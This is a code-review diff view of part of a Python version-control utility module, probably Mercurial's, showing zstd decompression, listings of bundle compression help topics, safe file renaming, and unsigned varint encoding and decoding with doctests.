3666 3697 chunks.append(z.flush())
3667 3698
3668 3699 if sum(map(len, chunks)) < insize:
3669 3700 return ''.join(chunks)
3670 3701 return None
3671 3702
3672 3703 def decompress(self, data):
3673 3704 insize = len(data)
3674 3705
3675 3706 try:
3676 3707 # This was measured to be faster than other streaming
3677 3708 # decompressors.
3678 3709 dobj = self._dctx.decompressobj()
3679 3710 chunks = []
3680 3711 pos = 0
3681 3712 while pos < insize:
3682 3713 pos2 = pos + self._decompinsize
3683 3714 chunk = dobj.decompress(data[pos:pos2])
3684 3715 if chunk:
3685 3716 chunks.append(chunk)
3686 3717 pos = pos2
3687 3718 # Frame should be exhausted, so no finish() API.
3688 3719
3689 3720 return ''.join(chunks)
3690 3721 except Exception as e:
3691 3722 raise error.RevlogError(_('revlog decompress error: %s') %
3692 3723 stringutil.forcebytestr(e))
3693 3724
3694 3725 def revlogcompressor(self, opts=None):
3695 3726 opts = opts or {}
3696 3727 return self.zstdrevlogcompressor(self._module,
3697 3728 level=opts.get('level', 3))
3698 3729
3699 3730 compengines.register(_zstdengine())
3700 3731
3701 3732 def bundlecompressiontopics():
3702 3733 """Obtains a list of available bundle compressions for use in help."""
3703 3734 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3704 3735 items = {}
3705 3736
3706 3737 # We need to format the docstring. So use a dummy object/type to hold it
3707 3738 # rather than mutating the original.
3708 3739 class docobject(object):
3709 3740 pass
3710 3741
3711 3742 for name in compengines:
3712 3743 engine = compengines[name]
3713 3744
3714 3745 if not engine.available():
3715 3746 continue
3716 3747
3717 3748 bt = engine.bundletype()
3718 3749 if not bt or not bt[0]:
3719 3750 continue
3720 3751
3721 3752 doc = pycompat.sysstr('``%s``\n %s') % (
3722 3753 bt[0], engine.bundletype.__doc__)
3723 3754
3724 3755 value = docobject()
3725 3756 value.__doc__ = doc
3726 3757 value._origdoc = engine.bundletype.__doc__
3727 3758 value._origfunc = engine.bundletype
3728 3759
3729 3760 items[bt[0]] = value
3730 3761
3731 3762 return items
3732 3763
3733 3764 i18nfunctions = bundlecompressiontopics().values()
3734 3765
3735 3766 # convenient shortcut
3736 3767 dst = debugstacktrace
3737 3768
3738 3769 def safename(f, tag, ctx, others=None):
3739 3770 """
3740 3771 Generate a name that it is safe to rename f to in the given context.
3741 3772
3742 3773 f: filename to rename
3743 3774 tag: a string tag that will be included in the new name
3744 3775 ctx: a context, in which the new name must not exist
3745 3776 others: a set of other filenames that the new name must not be in
3746 3777
3747 3778 Returns a file name of the form oldname~tag[~number] which does not exist
3748 3779 in the provided context and is not in the set of other names.
3749 3780 """
3750 3781 if others is None:
3751 3782 others = set()
3752 3783
3753 3784 fn = '%s~%s' % (f, tag)
3754 3785 if fn not in ctx and fn not in others:
3755 3786 return fn
3756 3787 for n in itertools.count(1):
3757 3788 fn = '%s~%s~%s' % (f, tag, n)
3758 3789 if fn not in ctx and fn not in others:
3759 3790 return fn
3760 3791
3761 3792 def readexactly(stream, n):
3762 3793 '''read n bytes from stream.read and abort if less was available'''
3763 3794 s = stream.read(n)
3764 3795 if len(s) < n:
3765 3796 raise error.Abort(_("stream ended unexpectedly"
3766 3797 " (got %d bytes, expected %d)")
3767 3798 % (len(s), n))
3768 3799 return s
3769 3800
3770 3801 def uvarintencode(value):
3771 3802 """Encode an unsigned integer value to a varint.
3772 3803
3773 3804 A varint is a variable length integer of 1 or more bytes. Each byte
3774 3805 except the last has the most significant bit set. The lower 7 bits of
3775 3806 each byte store the 2's complement representation, least significant group
3776 3807 first.
3777 3808
3778 3809 >>> uvarintencode(0)
3779 3810 '\\x00'
3780 3811 >>> uvarintencode(1)
3781 3812 '\\x01'
3782 3813 >>> uvarintencode(127)
3783 3814 '\\x7f'
3784 3815 >>> uvarintencode(1337)
3785 3816 '\\xb9\\n'
3786 3817 >>> uvarintencode(65536)
3787 3818 '\\x80\\x80\\x04'
3788 3819 >>> uvarintencode(-1)
3789 3820 Traceback (most recent call last):
3790 3821 ...
3791 3822 ProgrammingError: negative value for uvarint: -1
3792 3823 """
3793 3824 if value < 0:
3794 3825 raise error.ProgrammingError('negative value for uvarint: %d'
3795 3826 % value)
3796 3827 bits = value & 0x7f
3797 3828 value >>= 7
3798 3829 bytes = []
3799 3830 while value:
3800 3831 bytes.append(pycompat.bytechr(0x80 | bits))
3801 3832 bits = value & 0x7f
3802 3833 value >>= 7
3803 3834 bytes.append(pycompat.bytechr(bits))
3804 3835
3805 3836 return ''.join(bytes)
3806 3837
3807 3838 def uvarintdecodestream(fh):
3808 3839 """Decode an unsigned variable length integer from a stream.
3809 3840
3810 3841 The passed argument is anything that has a ``.read(N)`` method.
3811 3842
3812 3843 >>> try:
3813 3844 ... from StringIO import StringIO as BytesIO
3814 3845 ... except ImportError:
3815 3846 ... from io import BytesIO
3816 3847 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3817 3848 0
3818 3849 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3819 3850 1
3820 3851 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3821 3852 127
3822 3853 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3823 3854 1337
3824 3855 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3825 3856 65536
3826 3857 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3827 3858 Traceback (most recent call last):
3828 3859 ...
3829 3860 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3830 3861 """
3831 3862 result = 0
3832 3863 shift = 0
3833 3864 while True:
3834 3865 byte = ord(readexactly(fh, 1))
3835 3866 result |= ((byte & 0x7f) << shift)
3836 3867 if not (byte & 0x80):
3837 3868 return result
3838 3869 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now